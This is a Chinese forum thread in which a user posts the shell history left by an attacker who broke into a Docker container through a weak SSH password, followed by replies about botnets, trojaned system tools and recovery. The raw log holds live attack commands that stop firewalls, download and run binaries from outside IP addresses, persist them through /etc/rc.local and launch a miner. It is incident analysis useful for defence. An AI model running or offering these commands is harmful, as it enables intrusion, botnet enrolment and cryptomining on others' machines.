docker 容器 ssh 的弱密码被攻破了,看看黑客都干了啥

2016-12-29 16:55:57 +08:00
 suconghou
~ # cat .ash_history 
service iptables stop
wget http://211.147.119.195:1611/Linux2.6
chmod 0755 /root/Linux2.6
nohup /root/Linux2.6 > /dev/null 2>&1 &
chmod 777 Linux2.6
./Linux2.6
chmod 0755 /root/Linux2.6
nohup /root/Linux2.6 > /dev/null 2>&1 &
chmod 0777 Linux2.6
chmod u+x Linux2.6
./Linux2.6 &
chmod u+x Linux2.6
./Linux2.6 &
cd /tmp
service iptables stop
wget http://211.147.119.195:1611/Linux2.6
chmod 0755 /root/Linux2.6
nohup /root/Linux2.6 > /dev/null 2>&1 &
chmod 777 Linux2.6
./164
chmod 0755 /root/Linux2.6
nohup /root/Linux2.6 > /dev/null 2>&1 &
chmod 0777 Linux2.6
chmod u+x Linux2.6
./Linux2.6 &
chmod u+x dos6cc4
./Linux2.6 &
cd /tmp
echo "cd  /root/">>/etc/rc.local
echo "./Linux2.6&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
/gisdfoewrsfdf
/bin/busybox cp; /gisdfoewrsfdf
/bin/busybox  mount ;/gisdfoewrsfdf
/bin/busybox  echo -e '\x47\x72\x6f\x70/tmp' > /tmp/.nippon; /bin/busybox  cat /tmp/.nippon; /bin/busybox  rm -f /tmp/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/var/tmp' > /var/tmp/.nippon; /bin/busybox  cat /var/tmp/.nippon; /bin/busybox  rm -f /var/tmp/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/' > //.nippon; /bin/busybox  cat //.nippon; /bin/busybox  rm -f //.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/proc' > /proc/.nippon; /bin/busybox  cat /proc/.nippon; /bin/busybox  rm -f /proc/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/dev' > /dev/.nippon; /bin/busybox  cat /dev/.nippon; /bin/busybox  rm -f /dev/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/dev/pts' > /dev/pts/.nippon; /bin/busybox  cat /dev/pts/.nippon; /bin/busybox  rm -f /dev/pts/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/sys' > /sys/.nippon; /bin/busybox  cat /sys/.nippon; /bin/busybox  rm -f /sys/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup' > /sys/fs/cgroup/.nippon; /bin/busybox  cat /sys/fs/cgroup/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/systemd' > /sys/fs/cgroup/systemd/.nippon; /bin/busybox  cat /sys/fs/cgroup/systemd/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/systemd/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/cpuset' > /sys/fs/cgroup/cpuset/.nippon; /bin/busybox  cat /sys/fs/cgroup/cpuset/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/cpuset/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/perf_event' > /sys/fs/cgroup/perf_event/.nippon; /bin/busybox  cat /sys/fs/cgroup/perf_event/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/perf_event/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/net_cls' > /sys/fs/cgroup/net_cls/.nippon; /bin/busybox  cat /sys/fs/cgroup/net_cls/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/net_cls/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/cpuacct,cpu' > /sys/fs/cgroup/cpuacct,cpu/.nippon; /bin/busybox  cat /sys/fs/cgroup/cpuacct,cpu/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/cpuacct,cpu/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/blkio' > /sys/fs/cgroup/blkio/.nippon; /bin/busybox  cat /sys/fs/cgroup/blkio/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/blkio/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/memory' > /sys/fs/cgroup/memory/.nippon; /bin/busybox  cat /sys/fs/cgroup/memory/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/memory/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/freezer' > /sys/fs/cgroup/freezer/.nippon; /bin/busybox  cat /sys/fs/cgroup/freezer/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/freezer/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/devices' > /sys/fs/cgroup/devices/.nippon; /bin/busybox  cat /sys/fs/cgroup/devices/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/devices/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/hugetlb' > /sys/fs/cgroup/hugetlb/.nippon; /bin/busybox  cat /sys/fs/cgroup/hugetlb/.nippon; /bin/busybox  rm -f /sys/fs/cgroup/hugetlb/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/dev/mqueue' > /dev/mqueue/.nippon; /bin/busybox  cat /dev/mqueue/.nippon; /bin/busybox  rm -f /dev/mqueue/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/etc/resolv.conf' > /etc/resolv.conf/.nippon; /bin/busybox  cat /etc/resolv.conf/.nippon; /bin/busybox  rm -f /etc/resolv.conf/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/etc/hostname' > /etc/hostname/.nippon; /bin/busybox  cat /etc/hostname/.nippon; /bin/busybox  rm -f /etc/hostname/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/etc/hosts' > /etc/hosts/.nippon; /bin/busybox  cat /etc/hosts/.nippon; /bin/busybox  rm -f /etc/hosts/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/dev/shm' > /dev/shm/.nippon; /bin/busybox  cat /dev/shm/.nippon; /bin/busybox  rm -f /dev/shm/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/var/lib/mysql' > /var/lib/mysql/.nippon; /bin/busybox  cat /var/lib/mysql/.nippon; /bin/busybox  rm -f /var/lib/mysql/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/proc/bus' > /proc/bus/.nippon; /bin/busybox  cat /proc/bus/.nippon; /bin/busybox  rm -f /proc/bus/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/proc/fs' > /proc/fs/.nippon; /bin/busybox  cat /proc/fs/.nippon; /bin/busybox  rm -f /proc/fs/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/proc/irq' > /proc/irq/.nippon; /bin/busybox  cat /proc/irq/.nippon; /bin/busybox  rm -f /proc/irq/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/proc/sys' > /proc/sys/.nippon; /bin/busybox  cat /proc/sys/.nippon; /bin/busybox  rm -f /proc/sys/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/proc/sysrq-trigger' > /proc/sysrq-trigger/.nippon; /bin/busybox  cat /proc/sysrq-trigger/.nippon; /bin/busybox  rm -f /proc/sysrq-trigger/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/proc/kcore' > /proc/kcore/.nippon; /bin/busybox  cat /proc/kcore/.nippon; /bin/busybox  rm -f /proc/kcore/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/proc/timer_list' > /proc/timer_list/.nippon; /bin/busybox  cat /proc/timer_list/.nippon; /bin/busybox  rm -f /proc/timer_list/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/proc/timer_stats' > /proc/timer_stats/.nippon; /bin/busybox  cat /proc/timer_stats/.nippon; /bin/busybox  rm -f /proc/timer_stats/.nippon
/bin/busybox  echo -e '\x47\x72\x6f\x70/proc/sched_debug' > /proc/sched_debug/.nippon; /bin/busybox  cat /proc/sched_debug/.nippon; /bin/busybox  rm -f /proc/sched_debug/.nippon
/gisdfoewrsfdf
/bin/busybox cat /bin/echo ;/gisdfoewrsfdf
cd /tmp; /bin/busybox  wget http://217.23.10.181/bins/usb_bus.x86 -O - > usb_bus ; /bin/busybox  chmod 777 usb_bus ; ./usb_bus ;/gisdfoewrsfdf
service iptables stop
wget http://211.147.112.207:1611/Linux2.4
chmod 0755 /root/Linux2.4
nohup /root/Linux2.4 > /dev/null 2>&1 &
chmod 777 Linux2.4
./Linux2.4
chmod 0755 /root/Linux2.4
nohup /root/Linux2.4 > /dev/null 2>&1 &
chmod 0777 Linux2.4
chmod u+x Linux2.4
./Linux2.4 &
chmod u+x Linux2.4
./Linux2.4 &
cd /tmp
service iptables stop
wget http://211.147.112.207:1611/Linux2.6
chmod 0755 /root/Linux2.6
nohup /root/Linux2.6 > /dev/null 2>&1 &
chmod 777 Linux2.6
service iptables stop
./164
wget http://211.147.112.207:1611/Linux2.4
chmod 0755 /root/Linux2.6
chmod 0755 /root/Linux2.4
nohup /root/Linux2.6 > /dev/null 2>&1 &
nohup /root/Linux2.4 > /dev/null 2>&1 &
chmod 0777 Linux2.6
chmod 777 Linux2.4
chmod u+x Linux2.6
./Linux2.4
./Linux2.6 &
chmod 0755 /root/Linux2.4
chmod u+x dos6cc4
nohup /root/Linux2.4 > /dev/null 2>&1 &
./Linux2.6 &
chmod 0777 Linux2.4
cd /tmp
chmod u+x Linux2.4
service iptables stop
./Linux2.4 &
wget http://211.147.112.207:1611/dd-wrt
chmod u+x Linux2.4
chmod 0755 /root/dd-wrt
./Linux2.4 &
nohup /root/dd-wrt > /dev/null 2>&1 &
cd /tmp
chmod 777 dd-wrt
service iptables stop
./dd-wrt
wget http://211.147.112.207:1611/Linux2.6
chmod 0755 /root/dd-wrt
chmod 0755 /root/Linux2.6
nohup /root/dd-wrt > /dev/null 2>&1 &
nohup /root/Linux2.6 > /dev/null 2>&1 &
chmod 0777 dd-wrt
chmod 777 Linux2.6
chmod u+x dd-wrt
./164
./dd-wrt &
chmod 0755 /root/Linux2.6
chmod u+x dd-wrt
nohup /root/Linux2.6 > /dev/null 2>&1 &
./dd-wrt &
chmod 0777 Linux2.6
cd /tmp
chmod u+x Linux2.6
service iptables stop
./Linux2.6 &
wget http://211.147.112.207:1611/linux-arm
chmod u+x dos6cc4
chmod 0755 /root/linux-arm
./Linux2.6 &
nohup /root/linux-arm > /dev/null 2>&1 &
cd /tmp
chmod 777 linux-arm
service iptables stop
./linux-arm
wget http://211.147.112.207:1611/dd-wrt
chmod 0755 /root/linux-arm
nohup /root/linux-arm > /dev/null 2>&1 &
chmod 0777 linux-arm
chmod u+x linux-arm
chmod 0755 /root/dd-wrt
nohup /root/dd-wrt > /dev/null 2>&1 &
chmod 777 dd-wrt
./dd-wrt
./linux-arm &
chmod 0755 /root/dd-wrt
chmod u+x linux-arm
nohup /root/dd-wrt > /dev/null 2>&1 &
./linux-arm &
chmod 0777 dd-wrt
cd /tmp
chmod u+x dd-wrt
service iptables stop
./dd-wrt &
wget http://211.147.112.207:1611/linux-mips
chmod u+x dd-wrt
./dd-wrt &
chmod 0755 /root/linux-mips
nohup /root/linux-mips > /dev/null 2>&1 &
cd /tmp
chmod 777 linux-mips
service iptables stop
./linux-mips
wget http://211.147.112.207:1611/linux-arm
chmod 0755 /root/linux-mips
chmod 0755 /root/linux-arm
nohup /root/linux-mips > /dev/null 2>&1 &
nohup /root/linux-arm > /dev/null 2>&1 &
chmod 0777 linux-mips
chmod 777 linux-arm
chmod u+x linux-mips
./linux-arm
./linux-mips &
chmod 0755 /root/linux-arm
chmod u+x linux-mips
nohup /root/linux-arm > /dev/null 2>&1 &
./linux-mips &
chmod 0777 linux-arm
cd /tmp
chmod u+x linux-arm
service iptables stop
./linux-arm &
wget http://211.147.112.207:1611/taskhost.exe
chmod u+x linux-arm
chmod 0755 /root/taskhost.exe
./linux-arm &
nohup /root/taskhost.exe > /dev/null 2>&1 &
cd /tmp
chmod 777 taskhost.exe
service iptables stop
./taskhost.exe
wget http://211.147.112.207:1611/linux-mips
chmod 0755 /root/taskhost.exe
chmod 0755 /root/linux-mips
nohup /root/taskhost.exe > /dev/null 2>&1 &
nohup /root/linux-mips > /dev/null 2>&1 &
chmod 0777 taskhost.exe
chmod 777 linux-mips
chmod u+x taskhost.exe
./linux-mips
./taskhost.exe &
chmod 0755 /root/linux-mips
chmod u+x taskhost.exe
nohup /root/linux-mips > /dev/null 2>&1 &
./taskhost.exe &
chmod 0777 linux-mips
chmod u+x linux-mips
cd /tmp
./linux-mips &
echo "cd  /root/">>/etc/rc.local
chmod u+x linux-mips
echo "./Linux2.4&">>/etc/rc.local
./linux-mips &
echo "./Linux2.6&">>/etc/rc.local
cd /tmp
echo "./dd-wrt&">>/etc/rc.local
service iptables stop
echo "./linux-arm&">>/etc/rc.local
wget http://211.147.112.207:1611/taskhost.exe
echo "./linux-mips&">>/etc/rc.local
chmod 0755 /root/taskhost.exe
echo "./taskhost&">>/etc/rc.local
nohup /root/taskhost.exe > /dev/null 2>&1 &
echo "/etc/init.d/iptables stop">>/etc/rc.local
chmod 777 taskhost.exe
./taskhost.exe
chmod 0755 /root/taskhost.exe
nohup /root/taskhost.exe > /dev/null 2>&1 &
chmod 0777 taskhost.exe
chmod u+x taskhost.exe
./taskhost.exe &
chmod u+x taskhost.exe
./taskhost.exe &
cd /tmp
echo "cd  /root/">>/etc/rc.local
echo "./Linux2.4&">>/etc/rc.local
echo "./Linux2.6&">>/etc/rc.local
echo "./dd-wrt&">>/etc/rc.local
echo "./linux-arm&">>/etc/rc.local
echo "./linux-mips&">>/etc/rc.local
echo "./taskhost&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget http://115.236.92.99:12345/bins.sh
chmod 777 bins.sh
./bins.sh
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget http://115.236.92.99:12345/marlin
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
CD /tmp
wget http://115.236.92.99:8846/2500
chmod 777 2500
./2500 >/dev/null 2>&1 &
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
CD /tmp
wget http://115.236.92.99:12345/2500
chmod 777 2500
./2500 >/dev/null 2>&1 &
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget http://115.236.92.99:12345/marlin
chmod 777 marlin
./marlin -u 55489a27a09840cc82aec8c48858d30ec184344b162fb99e904f41e860a4dfad53db10d7b3f7.AK1 -I 20
suconghou
2016-12-29 17:08:31 +08:00
/etc/init.d # ls
DbSecuritySpt QsystemsshMmt VsystemsshMdt mariadb rc.local selinux
/etc/init.d # rm *t
/etc/init.d # ls
mariadb rc.local selinux
/etc/init.d # cat selinux
#!/bin/bash
/usr/bin/bsd-port/getty
/etc/init.d # ls -lh /usr/bin/bsd-port/getty
-rwxr-xr-x 1 root root 1.2M Dec 17 15:49 /usr/bin/bsd-port/getty
/etc/init.d # md5sum /usr/bin/bsd-port/getty
2dafa3cb07d8e13ae9bf9136ed97403c /usr/bin/bsd-port/getty
/etc/init.d # md5sum /bin/ps
2dafa3cb07d8e13ae9bf9136ed97403c /bin/ps
/etc/init.d # md5sum /bin/netstat
2dafa3cb07d8e13ae9bf9136ed97403c /bin/netstat
/etc/init.d # md5sum /usr/bin/lsof
2dafa3cb07d8e13ae9bf9136ed97403c /usr/bin/lsof
/etc/init.d #


md5 都是同一个 2dafa…
swulling
2016-12-29 17:12:24 +08:00
这个不叫『黑客』,这个叫『脚本小子』
ryd994
2016-12-29 17:12:50 +08:00
一般不建议用 docker 做蜜罐,因为如果对方看出来的话,想打穿还是有可能的
suconghou
2016-12-29 17:19:36 +08:00
无意间成了蜜罐 已停用 ssh
megatron
2016-12-29 17:52:53 +08:00
这是照着教材来的?
说个好玩儿的,前两天一个测试机被入侵了,入侵者竟然帮我升级了 jdk ,我想了半天也不知道为什么。
xss
2016-12-29 18:18:04 +08:00
这个是自动化脚本干的, 并不是人进行的操作.
应该是僵尸网络中的节点在找更多的节点, 加入僵尸网络.
suconghou
2016-12-29 18:42:45 +08:00
查了一下,可能是透过 redis 入侵的,cron 文件都被改了,redis 我开着外网端口来着。
tanszhe
2016-12-29 19:02:45 +08:00
干了什么啊?求大神解释一下这段代码干了什么?
dant
2016-12-29 23:51:20 +08:00
挖矿吧
maxwel1
2017-01-11 13:49:13 +08:00
测试用的 centos ,还在调试,然后过了个周末发现被执行了上面那个脚本,如果不重装的话,怎么清理干净呢?有什么办法吗?
suconghou
2017-01-11 14:02:23 +08:00
@maxwel1 建议备份后重装。ps、lsof、netstat(上面 md5sum 显示它们和 /usr/bin/bsd-port/getty 的 md5 相同),还有开机启动项、动态链接库,很多都被替换了。
maxwel1
2017-01-19 00:35:00 +08:00
@suconghou 多谢,看来只好重装了,最近这两周没空搞它,直接关机了。。
